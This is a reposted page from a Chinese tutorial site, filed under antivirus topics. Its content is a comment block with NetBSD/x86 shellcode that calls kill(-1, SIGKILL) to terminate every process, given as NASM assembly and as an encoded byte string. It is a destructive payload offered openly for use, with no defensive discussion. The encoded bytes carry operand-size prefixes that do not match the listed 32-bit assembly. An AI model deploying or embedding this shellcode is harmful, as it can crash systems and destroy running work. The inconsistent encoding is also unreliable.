当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > 杀掉进程的shellcode(netbsd/x86)

杀毒防毒
Win XP SP2拖放IE窗口可能引发黑客攻击
教你如何防止脚本病毒执行的通用方法
高手支招 巧妙利用系统进程手工杀毒
恶意软件威胁方法及防护技巧
病毒分类全知道 准确用好你手头的杀毒软件
深入解析金山毒霸6的三个特殊应用技巧
D2OL 让网络保卫大家的健康
专偷网银资料 提防“小燕表妹”造访
Linux系统下的病毒发展及其分类
浏览图片需小心 系统漏洞会染恶性病毒
操作系统中几个容易被误认为病毒的文件
使用Honeypots同计算机蠕虫病毒作斗争
毒霸提醒您:设置MSN可自动防卸MSN小尾巴
让Ghostbusters为电脑保驾护航
病毒杀不死的原因分析及对策
下载软件勿忘防毒:嵌入式监控确保上网无忧
在网吧如何防止病毒和快速杀毒
防治网络蠕虫病毒的技巧及其策略
让病毒自动还原被恶意修改键值
用WinRAR解析木马病毒的捆绑原理

杀毒防毒 中的 杀掉进程的shellcode(netbsd/x86)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-20   浏览: 63 ::
收藏到网摘: n/a

  /*

  netbsd/x86 kill all processes shellcode

  author Teo Manojlovic

  contact [email protected]

  this shellcode is using syscall number 37 or 0x25

  37 STD { int sys_kill(int pid, int signum); }

  here is assembler code using intel syntaxe and NASM

  --------------begin-----------

  section .note.netbsd.ident

  dd0x07,0x04,0x01

  db"NetBSD",0x00,0x00

  dd200000000

  section .data

  section .text

  global _start

  _start:

  xor eax, eax

  push 0x09

  mov eax, -1

  push eax

  xor eax,eax

  mov al, 37

  push eax

  int 0x80

  -------------------------end------------

  if we dissasemble this code wi will get shellcode

  "\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"

  */